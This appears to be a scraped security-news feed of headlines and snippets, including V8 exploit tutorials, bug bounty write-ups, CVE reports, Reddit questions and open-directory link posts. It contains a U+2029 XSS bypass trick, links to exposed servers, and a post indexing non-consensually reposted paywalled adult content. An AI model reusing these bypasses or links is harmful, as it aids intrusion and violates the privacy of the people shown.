    submitted by /u/notburneddown [link] [comments]  ( 3 min )
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30517(七)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) 从 0 开始学 V8 漏...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30517(七)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) 从 0 开始学 V8 漏...

  • Open

    Paragraph Separator(U+2029) XSS
    Gareth Heyes가 재미있는 XSS 트릭을 하나 공유했는데요. Browser가 이를 처리하는 방식을 잘 생각해보면, 여러 형태로 우회하는데 사용할 수 있을 것 같단 느낌이 들었습니다. 간단한 내용이니 한번 같이 살펴보시죠 😎 U+2029 XSS #!@*%
alert(1) 일반적으로 위와 같은 생긴 코드를 눈으로 본다면 절대 실행되지 않을거라 생각하실겁니다. 그럼 한번 복사해서 브라우저에 붙여넣어볼까요? ??!?!? 네 alert이 발생합니다. 이는 $와 alert 사이에 있는 특수문자 즉 Paragraph Separator로 인해 브라우저가 이를 잘라서 인식했기 떄문에 동작합니다.
    개발자만? 아니 우리도 스크래치 패드 필요해! Boop!
    저는 종종 재미있는 앱이 있을지 앱스토어를 둘러보곤 합니다. 그러던 중 보안 테스팅에서 쓸만할 것 같은 도구를 찾아 이번 연휴동안 사용해보고, 괜찮다고 느껴서 블로그를 통해 공유해봅니다. 바로 Boop 입니다. Boop Boop는 개발자를 위한 scratch pad라고 생각하시면 좋습니다. 코드나 여러가지 데이터 등을 작성/수정하면서 쉽게 치환 등을 기능을 사용할 수 있는 작은 에디터입니다. 공식 Github에서도 아래와 같이 소개하고 있습니다. A scriptable scratchpad for developers. In slow yet steady progress. Boop에서 CMD+b를 눌러 action 리스트를 불러옵니
  • Open

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »  ( 1 min )
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »  ( 1 min )
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »  ( 2 min )
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »  ( 1 min )
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »  ( 2 min )
  • Open

    End-2-End file transfer
    Hi, I want to download a file directly from a friend computer, what's the most secure way to do it with an encrypted tunnel ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months time and wanted to see if anyone great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]  ( 1 min )
    Book Recommendations for Memory Level Security
    Hi, I would like to ask a book advice to understand how operating systems memory level operations work. For example i want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures this operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs mostly written in C? submitted by /u/execute_sh [link] [comments]  ( 1 min )
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team has a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]  ( 3 min )
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]  ( 1 min )
  • Open

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 08
    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that took image took me a bit longer… Continue reading on Medium »  ( 7 min )
  • Open

    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
  • Open

    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SysInternals — The Other Way Around
    We all have been sometime, someday in our professional life have used SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following steps through part 1, we have lab setup and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
  • Open

    FreeBuf早报 | 美国起诉多个”诈骗“呼叫中心;一名美国黑客对朝鲜网络发动攻击
    因遭到勒索软件的攻击,位于荷兰阿姆斯特丹和鹿特丹、比利时安特卫普的几处港口的石油装卸和转运受阻。  ( 1 min )
  • Open

    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-38001(六)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) CVE-2021-380...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-38001(六)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) CVE-2021-380...
  • Open

    [译] [论文] Raft 共识算法(及 etcd/raft 源码解析)(USENIX, 2014)
    译者序 本文翻译自 USENIX 2014 论文 In Search of an Understandable Consensus Algorithm (Extended Version) ,文中提出了如今已广泛使用的 Raft 共识算法。 在 Raft 之前,Paxos 几乎是共识算法的代名词,但它有两个严重缺点: 很难准确理解(即使对专业研究者和该领域的教授) 很难正确实现(复杂 + 某些理论描述比较模糊) 结果正如 Chubby(基于 Paxos 的 Google 分布式锁服务,是 Google 众多全球分布式系 统的基础)开发者所说:“Paxos 的算法描述和真实需求之间存在一个巨大鸿沟,...... 最终的系统其实将建立在一个没有经过证明的协议之上” [4]。 对于大学教授来说,还有一个更实际的困难:Paxos 复杂难懂,但除了它之外,又没有其他 适合教学的替代算法。 因此,从学术界和工业界两方面需求出发,斯坦福大学博士生 Diego Ongaro 及其导师 John Ousterhout 提出了 Raft 算法,它的最大设计目标就是可理解性, 这也是为什么这篇文章的标题是《寻找一种可理解的共识算法》。 与原文的可理解性目标类似,此译文也是出于更好地理解 Raft 算法这一目的。 因此,除了翻译时调整排版并加入若干小标题以方便网页阅读,本文还对照了 etcd/raft v0.4 的实现,这个版本已经实现了 Raft 协议的大部分功能,但还未做工程优化, 函数、变量等大体都能对应到论文中,对理解算法有很大帮助。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 摘要 1 引言 1.1 本文背景与目的 1.2 研究成果简介 1.3 本文组织结构 2 复制式状态机(replicated state machines) …

  • Open

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming http trafic to be forwarded to the webserver. However, for this to work, i would need to have a fixed public address, which is not the case for me.Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm lacking trying to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS Poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get infos like users, policies, etc? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on Public WiFi Hotspots. Do I definitely need a VPN or just ensure I'm connecting to sites with HTTPS? Whatabout if I use celluar instead..? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
  • Open

    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
  • Open

    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    as it was mention needed to find the camera model number, exif this image but found nothing. again after reviewing the image get to know… Continue reading on Medium »  ( 1 min )
  • Open

    Resolviendo Daily Bugle de TryHackMe Pt1
    Muy buenos días, tarde o noches estimados lectores, el día de hoy les traigo mi primer publicación en Medium, la resolución del room de… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
  • Open

    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry including me as an individual including my personal blog and all the socially-oriented work and contributors that I've made to the industry during the past ten years? If an image is worth a thousand words consider going through these images which I just found and took photos of and guess what - brace yourselves for the ultimate reality where I've officially spend over two decades actively working and researching the security industry. What's my idea to publish these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Does a master’s in cybersecurity and digital forensics require an engineering maths background or is Bachelors in IT with topics like Basic maths, discrete structure and Numerical methods enough?
    what i know from my research is that different universities have different criteria like Calculus I and II but a basic undergrad IT course may not contain multiple maths topic like Computer science or engineering course does. So will bachelors in Information technology be enough to later apply as international student in different countries for Msc cyber forensics submitted by /u/axyut [link] [comments]  ( 2 min )
  • Open

    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    Untuk mengetahui basic dari SSRF bisa membaca Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-05 Review
    对Java反序列化数据绕WAF新姿势的补充 by ourren 连载:演化的高级威胁治理(五) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-05 Review
    对Java反序列化数据绕WAF新姿势的补充 by ourren 连载:演化的高级威胁治理(五) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
  • Open

    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30632(五)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 复现CVE-2021-30632 第三个研究的是CVE-2021-30632,其chrom...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30632(五)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 复现CVE-2021-30632 第三个研究的是CVE-2021-30632,其chrom...

  • Open

    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
  • Open

    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
  • Open

    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on portswigger web sec academy and I came across a DTD payload with the characters "%" in the nested entities. I tried to find if there is a syntax specification for this in xml but found nothing regarding it, all I found by googling this are just some more xml payloads. So, anybody have any idea what these characters exactly are and what they do? I am thinking like these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. ​ PS: I am a complete newbie. So, if this is a stupid question forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I opt in my college first year (1st sem), The college gave us the syllabus of C, I'm pretty bad at it cuz C isn't something that I had dealt firsthand in the last year and tbh I'm a python kinda guy I only worked with python so C isn't a area of my interest. So my question is that Do I need to be too good at C is it gonna be relevant somehow later in hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while, I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks, and such things., Last i checked it was the ALFA AWUS 036 N card, I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell, is actually nothing - with a strong password, WPA-2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n card that can inject packets. Just feel like there has been a lot of fragmentation over the last decade and really, any opinions on whether or not the whole "WiFi hacking" gig is dead, well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
  • Open

    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
  • Open

    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
  • Open

    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB ÇÖZÜMLERİ
    Business Logic (İş Mantığı) zafiyeti, bir web uygulamasının tasarımında ve uygulamasında, saldırganın istenmeyen davranışlar sergilemesine… Continue reading on Medium »  ( 15 min )
  • Open

    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
  • Open

    SecWiki News 2022-02-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
  • Open

    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis
  • Open

    冬训营丨高级威胁活动中C2的多样风格
    C2作为名词来讲,是指APT组织掌握的基础设施,也就是IP、域名、URL。  ( 1 min )
  • Open

    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
